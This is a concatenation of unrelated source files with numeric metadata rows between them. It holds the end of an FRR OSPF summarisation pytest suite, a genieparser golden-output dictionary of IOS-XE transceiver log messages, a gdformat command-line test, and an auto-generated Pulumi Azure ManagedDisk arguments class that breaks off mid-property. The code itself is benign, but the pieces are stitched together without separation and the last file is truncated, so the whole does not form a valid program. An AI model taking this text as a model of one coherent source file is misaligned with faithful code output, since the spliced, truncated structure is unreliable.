        "Verify that originated type 5 summary lsa is not refreshed because"
        " of the route map events."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": "12.0.0.0/8"}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    step("add rule in route map to deny configured summary address.")
    # Create ip prefix list
    pfx_list = {
        "r0": {
            "prefix_lists": {
                "ipv4": {
                    "pf_list_1_ipv4": [
                        {"seqid": 10, "network": "12.0.0.0/8", "action": "deny"},
                        {"seqid": 20, "network": "any", "action": "permit"},
                    ]
                }
            }
        }
    }
    result = create_prefix_lists(tgen, pfx_list)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step(
        "Verify that summary route is not denied, summary route should be"
        " originated if matching prefixes are present."
    )
    input_dict_summary = {"r0": {"static_routes": [{"network": "12.0.0.0/8"}]}}
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_summary)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
    assert (
        result is True
    ), "Testcase {} : Failed \n Error: Routes is missing in RIB".format(tc_name)

    write_test_footer(tc_name)
def test_ospf_type5_summary_tc51_p2(request):
    """OSPF CLI Show.

    verify ospf ASBR summary config and show commands behaviours.
    """
    tc_name = request.node.name
    write_test_header(tc_name)
    tgen = get_topogen()
    # Don't run this test if we have any failure.
    if tgen.routers_have_failure():
        pytest.skip(tgen.errors)
    global topo

    step("Bring up the base config as per the topology")
    reset_config_on_routers(tgen)

    step("Configure all the supported OSPF ASBR summary commands on DUT.")
    summary_prefix = SUMMARY["ipv4"][0].split("/")[0]

    def _summary_payload(delete):
        """Build the summary-address config used both for the initial
        configuration and for the configure/unconfigure churn loop.

        A fresh dict is returned on every call so the payload can never be
        mutated across iterations by the config-generation library.
        NOTE(review): the mask-24 entry appears twice in the original test;
        it looks deliberate (duplicate-config handling) — kept as-is.
        """
        entries = [
            {"prefix": summary_prefix, "mask": "8", "tag": 4294967295},
            {"prefix": summary_prefix, "mask": "16", "advertise": True},
            {"prefix": summary_prefix, "mask": "24", "advertise": False},
            {"prefix": summary_prefix, "mask": "24", "advertise": False},
        ]
        if delete:
            for entry in entries:
                entry["delete"] = True
        return {"r0": {"ospf": {"summary-address": entries}}}

    result = create_router_ospf(tgen, topo, _summary_payload(False))
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    step("Configure and re configure all the commands 10 times in a loop.")
    for _ in range(10):
        # Apply the full summary configuration ...
        result = create_router_ospf(tgen, topo, _summary_payload(False))
        assert result is True, "Testcase {} : Failed \n Error: {}".format(
            tc_name, result
        )
        # ... then remove it again, exercising config churn.
        result = create_router_ospf(tgen, topo, _summary_payload(True))
        assert result is True, "Testcase {} : Failed \n Error: {}".format(
            tc_name, result
        )

    step("Verify the show commands")
    input_dict = {
        SUMMARY["ipv4"][2]: {
            "Summary address": SUMMARY["ipv4"][2],
            "Metric-type": "E2",
            "Metric": 20,
            "Tag": 0,
            "External route count": 0,
        }
    }
    dut = "r0"
    result = verify_ospf_summary(tgen, topo, dut, input_dict)
    # Fixed: the original assert message used adjacent string literals with no
    # separator, producing "...FailedError: Summary missing...".
    assert result is True, "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(
        tc_name
    )

    write_test_footer(tc_name)
def test_ospf_type5_summary_tc49_p2(request):
    """OSPF summarisation Chaos.

    Summarise external routes on R0, then verify the summary survives a full
    router reload, an ospfd restart and a zebra restart.
    """
    tc_name = request.node.name
    write_test_header(tc_name)
    tgen = get_topogen()
    # Don't run this test if we have any failure.
    if tgen.routers_have_failure():
        pytest.skip(tgen.errors)
    global topo

    step("Bring up the base config as per the topology")
    reset_config_on_routers(tgen)
    protocol = "ospf"

    def _verify_summary_state():
        """Common checks run after every chaos event.

        Verifies: the summary route is present on R1 (OSPF RIB and RIB),
        R0 shows the summary with 5 contributing external routes, and the
        originally advertised component routes are withdrawn from R1.
        (The original test repeated this 50-line sequence four times.)
        """
        step(
            "Verify that external routes are summarised to configured summary "
            "address on R0 after 5 secs of delay timer expiry and only one "
            "route is sent to R1."
        )
        input_dict_summary = {
            "r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}
        }
        dut = "r1"
        result = verify_ospf_rib(tgen, dut, input_dict_summary)
        assert result is True, "Testcase {} : Failed \n Error: {}".format(
            tc_name, result
        )
        result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
        # Fixed: original message concatenated "Failed" + "Error" without a separator.
        assert result is True, "Testcase {} : Failed \n Error: Routes is missing in RIB".format(
            tc_name
        )

        step("Verify that show ip ospf summary should show the summaries.")
        input_dict = {
            SUMMARY["ipv4"][0]: {
                "Summary address": SUMMARY["ipv4"][0],
                "Metric-type": "E2",
                "Metric": 20,
                "Tag": 0,
                "External route count": 5,
            }
        }
        result = verify_ospf_summary(tgen, topo, "r0", input_dict)
        assert result is True, "Testcase {} : Failed \n Error: Summary missing in OSPF DB".format(
            tc_name
        )

        step("Verify that originally advertised routes are withdraw from there peer.")
        input_dict = {
            "r0": {
                "static_routes": [
                    {"network": NETWORK["ipv4"], "next_hop": "blackhole"}
                ]
            }
        }
        dut = "r1"
        result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
        assert result is not True, (
            "Testcase {} : Failed \n Error: "
            "Routes still present in OSPF RIB {}".format(tc_name, result)
        )
        result = verify_rib(
            tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
        )
        assert result is not True, "Testcase {} : Failed \n Error: Routes still present in RIB".format(
            tc_name
        )

    step(
        "Configure 5 static routes from the same network on R0"
        "5 static routes from different networks and redistribute in R0"
    )
    input_dict_static_rtes = {
        "r0": {
            "static_routes": [
                {"network": NETWORK["ipv4"], "next_hop": "blackhole"},
                {"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
            ]
        }
    }
    result = create_static_routes(tgen, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    red_static("r0")

    step("Verify that routes are learnt on R1.")
    dut = "r1"
    result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
    result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
    assert result is True, "Testcase {} : Failed \n Error: Routes is missing in RIB".format(
        tc_name
    )

    step(
        "Configure External Route summary in R0 to summarise 5" " routes to one route."
    )
    ospf_summ_r1 = {
        "r0": {
            "ospf": {
                "summary-address": [
                    {"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
                ]
            }
        }
    }
    result = create_router_ospf(tgen, topo, ospf_summ_r1)
    assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)

    # Baseline verification after configuring the summary.
    _verify_summary_state()

    step("Reload the FRR router")
    # stop/start -> restart FRR router and verify
    stop_router(tgen, "r0")
    start_router(tgen, "r0")
    _verify_summary_state()

    step("Kill OSPFd daemon on R0.")
    kill_router_daemons(tgen, "r0", ["ospfd"])
    step("Bring up OSPFd daemon on R0.")
    start_router_daemons(tgen, "r0", ["ospfd"])
    step("Verify OSPF neighbors are up after bringing back ospfd in R0")
    # Api call verify whether OSPF is converged
    ospf_convergence = verify_ospf_neighbor(tgen, topo)
    assert ospf_convergence is True, "setup_module :Failed \n Error: {}".format(
        ospf_convergence
    )
    _verify_summary_state()

    step("restart zebrad")
    kill_router_daemons(tgen, "r0", ["zebra"])
    step("Bring up zebra daemon on R0.")
    start_router_daemons(tgen, "r0", ["zebra"])
    _verify_summary_state()

    write_test_footer(tc_name)
if __name__ == "__main__":
    # Allow running this suite directly: forward CLI args to pytest,
    # with -s so router logs are not captured.
    sys.exit(pytest.main(["-s", *sys.argv[1:]]))
| 32.958493
| 88
| 0.551393
| 12,880
| 111,960
| 4.644721
| 0.034705
| 0.043628
| 0.058505
| 0.059575
| 0.921938
| 0.916187
| 0.909869
| 0.904704
| 0.89307
| 0.890562
| 0
| 0.023558
| 0.317542
| 111,960
| 3,396
| 89
| 32.968198
| 0.759397
| 0.036504
| 0
| 0.721868
| 0
| 0
| 0.310878
| 0.00029
| 0
| 0
| 0
| 0
| 0.089526
| 1
| 0.004246
| false
| 0
| 0.003892
| 0
| 0.008139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56c32bffda9a2202d300b9205f7e14773f637431
| 2,086
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowLoggingOnboardRpActiveTemperatureContinuous/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowLoggingOnboardRpActiveTemperatureContinuous/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowLoggingOnboardRpActiveTemperatureContinuous/cli/equal/golden_output_2_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
# Golden parsed output: one ERROR MESSAGE application record with three
# timestamped message lists; the transceiver-insertion list is generated
# from the affected port names to avoid 24 near-identical literals.
expected_output = {
    'application': 'ERROR MESSAGE',
    'error_message': {
        '11/11/2019 03:46:31': [
            'IOSXE-2-DIAGNOSTICS_PASSED : Diagnostics Thermal passed'
        ],
        '11/11/2019 03:46:41': [
            'IOSXE-2-DIAGNOSTICS_PASSED : Diagnostics Fantray passed'
        ],
        '11/11/2019 03:45:41': [
            'IOSXE-2-TRANSCEIVER_INSERTED : Transceiver module inserted in ' + port
            for port in (
                'Hu1/0/1', 'Hu1/0/4', 'Hu1/0/5', 'Hu1/0/10', 'Hu1/0/11',
                'Hu1/0/12', 'Fou1/0/15', 'Fou1/0/16', 'Fou1/0/17', 'Fou1/0/18',
                'Fou1/0/19', 'Fou1/0/20', 'Fou1/0/21', 'Fou1/0/22', 'Hu1/0/23',
                'Hu1/0/24', 'Hu1/0/25', 'Hu1/0/26', 'Hu1/0/28', 'Hu1/0/29',
                'Hu1/0/32', 'Hu1/0/33', 'Hu1/0/35', 'Hu1/0/36',
            )
        ],
    }
}
| 260.75
| 1,812
| 0.771812
| 303
| 2,086
| 5.221122
| 0.158416
| 0.098609
| 0.257901
| 0.379267
| 0.926675
| 0.854614
| 0.854614
| 0.854614
| 0.854614
| 0.854614
| 0
| 0.086839
| 0.111218
| 2,086
| 8
| 1,813
| 260.75
| 0.766451
| 0
| 0
| 0
| 0
| 0
| 0.905127
| 0.346909
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 13
|
56f55342152b2f0baf7a3d55a9d314dc901975bf
| 829
|
py
|
Python
|
tests/formatter/test_executable.py
|
dzil123/godot-gdscript-toolkit
|
d3687f66390937a4fefd90a508a4899d56fc9f7c
|
[
"MIT"
] | null | null | null |
tests/formatter/test_executable.py
|
dzil123/godot-gdscript-toolkit
|
d3687f66390937a4fefd90a508a4899d56fc9f7c
|
[
"MIT"
] | null | null | null |
tests/formatter/test_executable.py
|
dzil123/godot-gdscript-toolkit
|
d3687f66390937a4fefd90a508a4899d56fc9f7c
|
[
"MIT"
] | null | null | null |
import subprocess
from ..common import write_file
def test_valid_file(tmp_path):
    # A syntactically valid script must format cleanly (exit code 0).
    script_path = write_file(tmp_path, "script.gd", "tool")
    completed = subprocess.run(["gdformat", script_path], check=False)
    assert completed.returncode == 0
def test_check_valid_file_to_reformat(tmp_path):
    # --check on a valid but unformatted script must report a nonzero exit code.
    script_path = write_file(tmp_path, "script.gd", "tool;var x")
    completed = subprocess.run(["gdformat", "--check", script_path], check=False)
    assert completed.returncode != 0
def test_invalid_file(tmp_path):
    # An unparsable script ("too" is not valid GDScript) must fail formatting.
    script_path = write_file(tmp_path, "script.gd", "too")
    completed = subprocess.run(["gdformat", script_path], check=False)
    assert completed.returncode != 0
def test_invalid_file_check(tmp_path):
    # --check on an unparsable script must also report a nonzero exit code.
    script_path = write_file(tmp_path, "script.gd", "too")
    completed = subprocess.run(["gdformat", "--check", script_path], check=False)
    assert completed.returncode != 0
| 29.607143
| 88
| 0.697226
| 115
| 829
| 4.73913
| 0.243478
| 0.102752
| 0.121101
| 0.117431
| 0.842202
| 0.842202
| 0.842202
| 0.842202
| 0.842202
| 0.842202
| 0
| 0.005722
| 0.156815
| 829
| 27
| 89
| 30.703704
| 0.773963
| 0
| 0
| 0.333333
| 0
| 0
| 0.12304
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56fd92e135e564a246da8a53d8fda2ab5dcfae4e
| 89,455
|
py
|
Python
|
sdk/python/pulumi_azure/compute/managed_disk.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/compute/managed_disk.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/compute/managed_disk.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ManagedDiskArgs', 'ManagedDisk']
@pulumi.input_type
class ManagedDiskArgs:
def __init__(__self__, *,
create_option: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
storage_account_type: pulumi.Input[str],
disk_access_id: Optional[pulumi.Input[str]] = None,
disk_encryption_set_id: Optional[pulumi.Input[str]] = None,
disk_iops_read_only: Optional[pulumi.Input[int]] = None,
disk_iops_read_write: Optional[pulumi.Input[int]] = None,
disk_mbps_read_only: Optional[pulumi.Input[int]] = None,
disk_mbps_read_write: Optional[pulumi.Input[int]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
encryption_settings: Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']] = None,
gallery_image_reference_id: Optional[pulumi.Input[str]] = None,
hyper_v_generation: Optional[pulumi.Input[str]] = None,
image_reference_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logical_sector_size: Optional[pulumi.Input[int]] = None,
max_shares: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
network_access_policy: Optional[pulumi.Input[str]] = None,
on_demand_bursting_enabled: Optional[pulumi.Input[bool]] = None,
os_type: Optional[pulumi.Input[str]] = None,
public_network_access_enabled: Optional[pulumi.Input[bool]] = None,
source_resource_id: Optional[pulumi.Input[str]] = None,
source_uri: Optional[pulumi.Input[str]] = None,
storage_account_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tier: Optional[pulumi.Input[str]] = None,
trusted_launch_enabled: Optional[pulumi.Input[bool]] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ManagedDisk resource.
:param pulumi.Input[str] create_option: The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Managed Disk should exist.
:param pulumi.Input[str] storage_account_type: The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
:param pulumi.Input[str] disk_access_id: The ID of the disk access resource for using private endpoints on disks.
:param pulumi.Input[str] disk_encryption_set_id: The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
:param pulumi.Input[int] disk_iops_read_only: The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_iops_read_write: The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
:param pulumi.Input[int] disk_mbps_read_only: The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_mbps_read_write: The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
:param pulumi.Input[int] disk_size_gb: Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
:param pulumi.Input['ManagedDiskEncryptionSettingsArgs'] encryption_settings: A `encryption_settings` block as defined below.
:param pulumi.Input[str] gallery_image_reference_id: ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if image_reference_id is specified.
:param pulumi.Input[str] hyper_v_generation: The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] image_reference_id: ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if gallery_image_reference_id is specified.
:param pulumi.Input[str] location: Specified the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] logical_sector_size: Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
:param pulumi.Input[int] max_shares: The maximum number of VMs that can attach to the disk at the same time. Value greater than one indicates a disk that can be mounted on multiple VMs at the same time.
:param pulumi.Input[str] name: Specifies the name of the Managed Disk. Changing this forces a new resource to be created.
:param pulumi.Input[str] network_access_policy: Policy for accessing the disk via network. Allowed values are `AllowAll`, `AllowPrivate`, and `DenyAll`.
:param pulumi.Input[bool] on_demand_bursting_enabled: Specifies if On-Demand Bursting is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] os_type: Specify a value when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Valid values are `Linux` or `Windows`.
:param pulumi.Input[bool] public_network_access_enabled: Whether it is allowed to access the disk via public network. Defaults to `true`.
:param pulumi.Input[str] source_resource_id: The ID of an existing Managed Disk to copy `create_option` is `Copy` or the recovery point to restore when `create_option` is `Restore`
:param pulumi.Input[str] source_uri: URI to a valid VHD file to be used when `create_option` is `Import`.
:param pulumi.Input[str] storage_account_id: The ID of the Storage Account where the `source_uri` is located. Required when `create_option` is set to `Import`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] tier: The disk performance tier to use. Possible values are documented [here](https://docs.microsoft.com/en-us/azure/virtual-machines/disks-change-performance). This feature is currently supported only for premium SSDs.
:param pulumi.Input[bool] trusted_launch_enabled: Specifies if Trusted Launch is enabled for the Managed Disk. Defaults to `false`.
:param pulumi.Input[str] zones: A collection containing the availability zone to allocate the Managed Disk in.
"""
pulumi.set(__self__, "create_option", create_option)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "storage_account_type", storage_account_type)
if disk_access_id is not None:
pulumi.set(__self__, "disk_access_id", disk_access_id)
if disk_encryption_set_id is not None:
pulumi.set(__self__, "disk_encryption_set_id", disk_encryption_set_id)
if disk_iops_read_only is not None:
pulumi.set(__self__, "disk_iops_read_only", disk_iops_read_only)
if disk_iops_read_write is not None:
pulumi.set(__self__, "disk_iops_read_write", disk_iops_read_write)
if disk_mbps_read_only is not None:
pulumi.set(__self__, "disk_mbps_read_only", disk_mbps_read_only)
if disk_mbps_read_write is not None:
pulumi.set(__self__, "disk_mbps_read_write", disk_mbps_read_write)
if disk_size_gb is not None:
pulumi.set(__self__, "disk_size_gb", disk_size_gb)
if encryption_settings is not None:
pulumi.set(__self__, "encryption_settings", encryption_settings)
if gallery_image_reference_id is not None:
pulumi.set(__self__, "gallery_image_reference_id", gallery_image_reference_id)
if hyper_v_generation is not None:
pulumi.set(__self__, "hyper_v_generation", hyper_v_generation)
if image_reference_id is not None:
pulumi.set(__self__, "image_reference_id", image_reference_id)
if location is not None:
pulumi.set(__self__, "location", location)
if logical_sector_size is not None:
pulumi.set(__self__, "logical_sector_size", logical_sector_size)
if max_shares is not None:
pulumi.set(__self__, "max_shares", max_shares)
if name is not None:
pulumi.set(__self__, "name", name)
if network_access_policy is not None:
pulumi.set(__self__, "network_access_policy", network_access_policy)
if on_demand_bursting_enabled is not None:
pulumi.set(__self__, "on_demand_bursting_enabled", on_demand_bursting_enabled)
if os_type is not None:
pulumi.set(__self__, "os_type", os_type)
if public_network_access_enabled is not None:
pulumi.set(__self__, "public_network_access_enabled", public_network_access_enabled)
if source_resource_id is not None:
pulumi.set(__self__, "source_resource_id", source_resource_id)
if source_uri is not None:
pulumi.set(__self__, "source_uri", source_uri)
if storage_account_id is not None:
pulumi.set(__self__, "storage_account_id", storage_account_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tier is not None:
pulumi.set(__self__, "tier", tier)
if trusted_launch_enabled is not None:
pulumi.set(__self__, "trusted_launch_enabled", trusted_launch_enabled)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="createOption")
def create_option(self) -> pulumi.Input[str]:
"""
The method to use when creating the managed disk. Changing this forces a new resource to be created. Possible values include `Import` (Import a VHD file in to the managed disk (VHD specified with `source_uri`), `Empty` (Create an empty managed disk), `Copy` (Copy an existing managed disk or snapshot, specified with `source_resource_id`), `FromImage` (Copy a Platform Image, specified with `image_reference_id`), `Restore` (Set by Azure Backup or Site Recovery on a restored disk, specified with `source_resource_id`).
"""
return pulumi.get(self, "create_option")
@create_option.setter
def create_option(self, value: pulumi.Input[str]):
pulumi.set(self, "create_option", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Managed Disk should exist.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="storageAccountType")
def storage_account_type(self) -> pulumi.Input[str]:
"""
The type of storage to use for the managed disk. Possible values are `Standard_LRS`, `StandardSSD_ZRS`, `Premium_LRS`, `Premium_ZRS`, `StandardSSD_LRS` or `UltraSSD_LRS`.
"""
return pulumi.get(self, "storage_account_type")
@storage_account_type.setter
def storage_account_type(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_type", value)
@property
@pulumi.getter(name="diskAccessId")
def disk_access_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the disk access resource for using private endpoints on disks.
"""
return pulumi.get(self, "disk_access_id")
@disk_access_id.setter
def disk_access_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_access_id", value)
@property
@pulumi.getter(name="diskEncryptionSetId")
def disk_encryption_set_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a Disk Encryption Set which should be used to encrypt this Managed Disk.
"""
return pulumi.get(self, "disk_encryption_set_id")
@disk_encryption_set_id.setter
def disk_encryption_set_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disk_encryption_set_id", value)
@property
@pulumi.getter(name="diskIopsReadOnly")
def disk_iops_read_only(self) -> Optional[pulumi.Input[int]]:
"""
The number of IOPS allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. One operation can transfer between 4k and 256k bytes.
"""
return pulumi.get(self, "disk_iops_read_only")
    # NOTE(review): accessors below are pulumi-codegen boilerplate; each getter/setter
    # simply proxies the snake_case attribute through pulumi.get/pulumi.set.
    @disk_iops_read_only.setter
    def disk_iops_read_only(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_iops_read_only", value)
    @property
    @pulumi.getter(name="diskIopsReadWrite")
    def disk_iops_read_write(self) -> Optional[pulumi.Input[int]]:
        """
        The number of IOPS allowed for this disk; only settable for UltraSSD disks. One operation can transfer between 4k and 256k bytes.
        """
        return pulumi.get(self, "disk_iops_read_write")
    @disk_iops_read_write.setter
    def disk_iops_read_write(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_iops_read_write", value)
    @property
    @pulumi.getter(name="diskMbpsReadOnly")
    def disk_mbps_read_only(self) -> Optional[pulumi.Input[int]]:
        """
        The bandwidth allowed across all VMs mounting the shared disk as read-only; only settable for UltraSSD disks with shared disk enabled. MBps means millions of bytes per second.
        """
        return pulumi.get(self, "disk_mbps_read_only")
    @disk_mbps_read_only.setter
    def disk_mbps_read_only(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_mbps_read_only", value)
    @property
    @pulumi.getter(name="diskMbpsReadWrite")
    def disk_mbps_read_write(self) -> Optional[pulumi.Input[int]]:
        """
        The bandwidth allowed for this disk; only settable for UltraSSD disks. MBps means millions of bytes per second.
        """
        return pulumi.get(self, "disk_mbps_read_write")
    @disk_mbps_read_write.setter
    def disk_mbps_read_write(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_mbps_read_write", value)
    @property
    @pulumi.getter(name="diskSizeGb")
    def disk_size_gb(self) -> Optional[pulumi.Input[int]]:
        """
        Specifies the size of the managed disk to create in gigabytes. If `create_option` is `Copy` or `FromImage`, then the value must be equal to or greater than the source's size. The size can only be increased.
        """
        return pulumi.get(self, "disk_size_gb")
    @disk_size_gb.setter
    def disk_size_gb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "disk_size_gb", value)
    @property
    @pulumi.getter(name="encryptionSettings")
    def encryption_settings(self) -> Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']]:
        """
        An `encryption_settings` block as defined below.
        """
        return pulumi.get(self, "encryption_settings")
    @encryption_settings.setter
    def encryption_settings(self, value: Optional[pulumi.Input['ManagedDiskEncryptionSettingsArgs']]):
        pulumi.set(self, "encryption_settings", value)
    @property
    @pulumi.getter(name="galleryImageReferenceId")
    def gallery_image_reference_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of a Gallery Image Version to copy when `create_option` is `FromImage`. This field cannot be specified if `image_reference_id` is specified.
        """
        return pulumi.get(self, "gallery_image_reference_id")
    @gallery_image_reference_id.setter
    def gallery_image_reference_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "gallery_image_reference_id", value)
    @property
    @pulumi.getter(name="hyperVGeneration")
    def hyper_v_generation(self) -> Optional[pulumi.Input[str]]:
        """
        The HyperV Generation of the Disk when the source of an `Import` or `Copy` operation targets a source that contains an operating system. Possible values are `V1` and `V2`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "hyper_v_generation")
    @hyper_v_generation.setter
    def hyper_v_generation(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "hyper_v_generation", value)
    @property
    @pulumi.getter(name="imageReferenceId")
    def image_reference_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of an existing platform/marketplace disk image to copy when `create_option` is `FromImage`. This field cannot be specified if `gallery_image_reference_id` is specified.
        """
        return pulumi.get(self, "image_reference_id")
    @image_reference_id.setter
    def image_reference_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "image_reference_id", value)
    @property
    @pulumi.getter
    def location(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "location")
    @location.setter
    def location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "location", value)
    @property
    @pulumi.getter(name="logicalSectorSize")
    def logical_sector_size(self) -> Optional[pulumi.Input[int]]:
        """
        Logical Sector Size. Possible values are: `512` and `4096`. Defaults to `4096`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "logical_sector_size")
    @logical_sector_size.setter
    def logical_sector_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "logical_sector_size", value)
    @property
    @pulumi.getter(name="maxShares")
    def max_shares(self) -> Optional[pulumi.Input[int]]:
        """
